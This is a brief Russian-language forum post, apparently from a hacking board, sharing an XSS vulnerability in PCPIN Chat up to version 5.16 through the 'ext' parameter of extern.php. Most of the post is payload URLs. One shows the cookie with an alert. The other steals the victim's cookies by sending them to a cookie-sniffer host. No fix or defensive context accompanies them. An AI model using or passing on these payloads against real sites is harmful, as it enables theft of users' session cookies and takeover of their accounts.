Не нашёл открытой темы, куда можно постить уязвимости движков, в общем вот, нашёл почти год назад, не помню, почему так извращался. Type:[XSS] Product: PCPIN Chat <= 5.16 Code: http://sitename/chat/extern.php?ext=javascript:alert(document.cookie) Ну, а на сниффер слал так, наверное можно и проще, сейчас лень было переписывать: Code: extern.php?ext=javascript:navigate('http:'.concat('//sniffer.xx?',document.cookie))